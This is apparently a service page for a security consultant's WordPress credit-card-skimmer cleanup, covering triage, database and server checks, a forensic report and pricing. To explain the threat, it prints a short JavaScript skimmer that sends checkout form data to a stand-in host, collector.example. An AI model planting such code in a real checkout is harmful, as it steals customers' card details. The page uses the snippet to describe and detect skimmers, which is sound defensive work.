threatover Patrik Grobshäuser

CARD SKIMMER · WORDPRESS · REMOVED

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

MECHANISM

A few lines of JavaScript can steal every order.

A card skimmer is a tiny piece of JavaScript that listens to your checkout form. Every time a customer types their card number, the skimmer makes a copy and sends it to an address the attacker controls — usually a server that looks innocent from the outside.

The page still works. The order still goes through. Nothing looks wrong to the customer or to you. I reproduce the order in a sandbox, trace the script back to where it lives in your site, and remove it without breaking the rest of the checkout.

rough shape of a checkout skimmer
01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

What I remove

Every place a skimmer can hide.

  • TRIAGE

    I place a test order in a sandbox and watch every network call the checkout makes.

  • JAVASCRIPT

    Theme files, plugin assets, and inline scripts reviewed. Anything sending form data off-domain — pulled.

  • DATABASE

    Injected scripts in wp_options, wp_posts, and active widgets — purged. Persistence removed.

  • SERVER

    PHP backdoors that re-install the skimmer hunted down. Cron jobs and must-use plugins checked.

  • TIMELINE

    First-seen and last-seen dates established so you know which orders were exposed.

  • REPORT

    Plain-English forensic write-up suitable for acquirers and insurers. Entry vector named.

Pricing

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Start a cleanup

Monitoring

$29 / mo

per site, cancel any time

Continuous monitoring, hardening, one cleanup per year included.

Get protected

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

See all services →

Email [email protected] or use the contact form.